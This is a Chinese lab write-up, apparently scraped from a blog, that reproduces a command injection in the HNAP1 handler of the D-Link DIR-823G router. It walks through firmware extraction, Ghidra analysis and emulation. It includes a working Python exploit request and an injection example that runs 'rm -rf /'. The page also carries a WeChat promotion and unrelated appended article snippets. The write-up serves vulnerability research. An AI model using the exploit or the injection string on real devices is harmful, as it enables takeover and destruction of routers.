路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路

news/2025/3/18 10:08:07/文章来源:https://www.cnblogs.com/hetianlab/p/18778363

前言

D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行任意的操作系统命令。

漏洞分析

Image

binwalk提取固件,成功获取到固件。

Image

Image

现在我们已经进入到应用里了,那么我们在进行分析固件的时候,应该怎么去分析这个情况?首先,我们去分析别人的漏洞,别人是会告诉哪里会出现问题。但是我们现在假设我们是分析一个未知固件,我们就得先知道这个固件有哪些应用,启动了哪些服务,最清晰和简便的方式就是去看我们etc文件下面,里面有个叫init.d的目录,里面是关于启动项的内容。

Image

我们首先来看rcS下面的内容 vim rcS

首先是设置ip,然后挂载了两个文件系统分别是proc,这是与进程相关的文件系统,包括当前进程启动存放在哪个地址。

还有ramfs文件系统,根据以前的笔记,可知ramfs文件系统跟RAM相关。

【----帮助网安学习,以下所有学习资料免费领!加vx:yj520400,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

然后下面就是判断是否还有挂载别的文件系统。

然后mkdir就是创建各种各样的文件夹,都有对应的功能,比如说创建了pptp文件夹,针对拨号上网的功能,然后还有smbd服务,可以看到创建了一个usb的文件夹,说明该固件有可以跟usb也就是U盘相关的操作,接下来都是一些配置信息。

Image

继续往下翻

可以看到该固件启动了web server的web服务,也就是httpd的内容,这里启动的是goahead,通过这个名字,我们可以确定web服务就是goahead,如果想要分析web服务的话,就直接分析goahead就可以。

Image

我们回到squashfs-root目录下,搜索goahead的一些简单情况

grep -ir "goahead" .

Image

最下面是两个启动项的内容,可以忽略,然后第一行是bin的可执行应用,这个其实就是我们最后分析的内容。

那如何分析呢?它是一个HNAP1请求,那就可以去检索我们的HANP1请求

grep -ir "HNAP1" .

Image

可以看到它检索到一些js代码,js代码对我们来说一般,(比较我们是找二进制相关的漏洞)

但是,我们可以发现它匹配了一个二进制程序,也就是goahead。

这里我们先科普一下goahead的一些情况:

GoAhead ,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer。

goahead的websUrlHandlerDefine函数允许用户自定义不同url的处理函数。

它在进行编写与它相关的请求,是通过websUrlHandlerDefine来确定的。

websUrlHandlerDefine(T("/HNAP1"),NULL,0, websHNAPHandler,0);
websUrlHandlerDefine(T("/goform"),NULL,0, websFormHandler,0);
websUrlHandlerDefine(T("/cgi.bin"),NULL,0, websCgiHandler,0);

使用ghidra进行逆向分析,goahead二进制文件在squashfs-root目录下的bin目录下

Image

那进入到goahead反编译界面该如何分析呢?一种是找到main函数去进行分析,比较耗时

一种是通过关键字来搜索,反推调用情况,来推测每个功能的解析情况 ctrl+shift+E

Image

匹配成功,停在指定区域

Image

但是它所对应的反编译代码还是很多的,所以我们可以通过反编译出来的函数名,进行查看它的调用关系。

Image

一路往下翻,终于找到我们所要的东西

Image

而且我们看到,这个函数继续往上调的话就是main函数了,所以其实一开始也是可以从main函数来分析的(0.0)

所以现在我们可以重点来分析这个函数

Image

前面还是做一些判断,然后请求还有不止HNAP1,对应的都是一个函数。

同一个函数做的事情,类似于websUrlHandlerDefine这个函数,那HANP1对应的函数是

FUN_0042383c,那就双击进去看看

Image

这里就是漏洞点,这里执行了memset和snprintf,一般来说这里应该是不存在漏洞点,但是下面一条语句是system,也就是把格式化化的字符串直接就拿到了system函数作为参数传递进去,而snprintf这里的参数有个echo,有个单引号问题。

比如说正常代码

#!/bin/bash
read -p "Enter your name: " name
echo 'Hello, '$name'!'

攻击步骤

正常输入:用户输入 Alice,输出:

Hello, Alice!

恶意输入:用户输入 '$(id)',此时脚本实际执行的命令变为:

echo 'Hello, ''$(id)'!'

输出:

Hello, $(id)!

单引号内的 $(id) 不会被执行,暂时安全。

更危险的输入:用户输入 ' && rm -rf / #,命令变为:

echo 'Hello, '' && rm -rf / #'!

此时,第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令,在 echo 之后执行。# 注释掉后续的 '!,避免语法错误。

那么会导致rm -rf / 会被执行,删除系统文件!

所以,如果我们构造一些恶意的代码写入到snprintf中,再传递到system函数,就会造成命令注入漏洞。

但是我们要进到漏洞点的话,还需要满足函数上面的一些要求。

所以我们得符合上面函数的一些限制才能进入到漏洞点来,这里先取了PTR_s_SetMultipleActions_00588d80的首地址,赋值给DAT_0058a6c4,然后DAT_0058a6c4自身判断和自加2来进行循环判断,用strstr函数查找DAT_0058a6c4在param_+0x524中出现的位置,并赋值给pcVar1,如果pcVar1的值不为0的话,就会进入到我们的漏洞点来。

Image

DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关,双击进去看看

Image

可以看到里面都是它对应的一些方法,比如说SetMultipleActions之类的。

固件模拟

分析到这里,基本上是明朗了,接下来就要进行固件模拟操作,使用firmadyne模拟固件启动。

Image

sudo ./DIR823G_V1.0.2B05_20181207.sh

然后firmadyne默认的密码就是firmadyne

Image

得等一段时间,然后192.168.0.1

但是这个一直搞不定,模拟不起来,也不知道是什么原因,排查不出。

然后换成了firmware analysis plus (fap)这个框架,就模拟起来了

Image

等一段时间后,回车,就可以模拟起来了,输入192.168.0.1

Image

进入向导,随便输入点东西

Image

Image

密码8位,输入12345678

Image

然后就开始配置一些内容,同时可以注意到左侧已经把一些数据写入到关键的文件夹中

Image

配置完毕,登录,成功进入路由器

Image

exp编写

#!/usr/bin/env python
#-*- coding:utf-8 -*-
​
import requests
​
ip='192.168.0.1'
​
command="'`echo aaaaaaaaa > /web_mtn/test.txt`'"
length=len(command)
​
headers=requests.utils.default_headers()
headers["Content-Length"]=str(length)
headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"'
headers["Content-Type"]="text/xml; charset=UTF-8"
headers["Accept"]="*/*"
headers["Accept-Encoding"]="gzip, deflate"
headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8"
​
payload=command
r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload)

因为是http请求,所以我们使用requests,然后设置ip,设置命令,构造报头,最后post请求将HNAP1,headers和payload都传过去。

Image

Image

复现完毕,ctrl+a 然后x结束固件模拟。

更多网安技能的在线实操练习,请点击这里>>

  

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/900812.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

北斗卫星时钟源,安徽京准助力国产时间精准度

北斗卫星时钟源,安徽京准助力国产时间精准度北斗卫星时钟源,安徽京准助力国产时间精准度 北斗卫星时钟源,安徽京准助力国产时间精准度 京准电钟官微——ahjzsz 北斗卫星时钟源作为中国自主研发的全球卫星导航系统的重要组成部分,其时间精准度的提升依赖于技术创新和系统优化…

ASE60N30-ASEMI工业自动化专用ASE60N30

ASE60N30-ASEMI工业自动化专用ASE60N30编辑:LL ASE60N30-ASEMI工业自动化专用ASE60N30 型号:ASE60N30 品牌:ASEMI 封装:TO-247 最大漏源电流:60A 漏源击穿电压:300V 批号:最新 RDS(ON)Max:38mΩ 引脚数量:3 沟道类型:N沟道MOS管 封装尺寸:如图 特性:MOS管、N沟道…

1周上线,2个月交付!有巢数智如何用 NocoBase 颠覆建筑行业数智化效率

有巢数智利用 NocoBase 平台,在建筑行业实现了数智化转型。 他们在 1 周内上线,2 个月内交付项目,显著提升了项目交付效率。 了解他们如何通过 NocoBase 的插件化架构,快速构建和调整功能,以满足复杂的业务需求。原文链接:https://www.nocobase.com/cn/blog/rapid-develo…

GoT:基于思维链的语义-空间推理框架为视觉生成注入思维能力

文探讨GoT框架如何通过语义-空间思维链方法提升图像生成的精确性与一致性 计算机视觉领域正经历一次技术革新:一种不仅能将文本转换为图像,还能在生成过程中实施结构化推理的系统。这一系统即为GoT(Generative Thoughts of Thinking,生成式思维链)框架——一种将显式推理机…

极速突破,PolarDB MySQL 列存索引加速复杂查询,完成任务可领取200社区积分!

「技术解决方案【Cloud Up 挑战赛】」上线了! 在电商行业,商品筛选页是用户找理想商品的关键,但商品数量激增、用户需求多样使现有筛选页面面临挑战,庞大商品数据需实时处理致系统性能要求高,用户筛选排序要求复杂使查询请求变复杂,传统数据库查询方式存在响应慢、延迟高…

2025-03-18 实践目标:numpy pandas matplotlib

python环境:Python 3.13.2 参考网络视频:https://www.bilibili.com/video/BV1KM4y1b7sC?spm_id_from=333.788.player.switch&vd_source=3bdaecff10bd344788cc194461374709&p=2pip install jupyter pip install numpyjupyter#本地运行编辑器 (文本,代码,绘图) j…

配置 pip 镜像源

配置 pip 镜像源配置 pip 镜像源 要配置 pip 使用国内的镜像源以加速包的下载,可以按照以下步骤操作: 1. 临时使用镜像源 在安装包时,可以通过 -i 参数临时指定镜像源。例如: pip install 包名 -i https://pypi.tuna.tsinghua.edu.cn/simple常用的国内镜像源有:清华大学:…

通义灵码插件使用指南(JetBrains IDE / Windows)

目录‌环境要求‌ ‌安装步骤‌ ‌基础功能使用‌3.1 代码续写与补全 3.2 生成代码注释 3.3 编写单元测试 3.4 解释代码含义‌高级功能配置与使用‌4.1 模型选择与切换 4.2 代码优化 4.3 智能问答 4.4 异常排查‌常见问题解答‌ ‌支持与反馈‌1. 环境要求‌操作系统‌: Window…

库存乱、找货难?仓库管理三定、五距、七方法教会你!

做仓库管理,最怕的就是库存乱、找货难。货品东一堆、西一堆,明明系统里显示有货,结果一翻库房,连个影子都找不到; 好不容易找到了,又发现不是要的型号。 拣货员天天加班,客户催单催得急,仓库主管被骂得怀疑人生。问题到底出在哪? 其实,80%的仓库管理混乱,都是因为缺…

二维材料芯突破,,纳米孔测序有望梦想成真-中科院物理所-芯晨微纳(河南)

中科院物理所成功研制出厚度仅0.1纳米(1埃米)的单原子层二维金属(如铋、锡),横向尺寸达毫米级,且稳定性超1年! 同样是原子的平面展开,石墨烯是一种物质,而“二维金属”是一类物质,其意义远超石墨烯。 在超微型低功耗晶体管领域,二维金属材料能够凭借其独特的原子结构…

记录一个蓝桥杯串口2的问题

去年整串口的时候也是用的定时器2来当波特率发生器,但是死活不能用,所以去年是用定时器1来当波特率发生器,所以后面国赛的时候吃屎了。 今天在练习第十届决赛的时候又遇到了这个问题,由于用的是新模板,所以以为是模板里sprintf的问题,但经过排查不是。经过很久的排查发现…

在线记事本 | AI 设计

AI 设计在线记事本,可以临时使用。前情概要 以前用过的在线记事本,都是将对应的网址嵌入本博客中来使用,20250318,心血来潮给 DeepSeek 指令发送指令,“给我设计一套在线记事本的代码,要求能嵌入博客中,HTML,CSS,JS”,就这样简单的一句话,不到 2 分钟,一套完整的网页…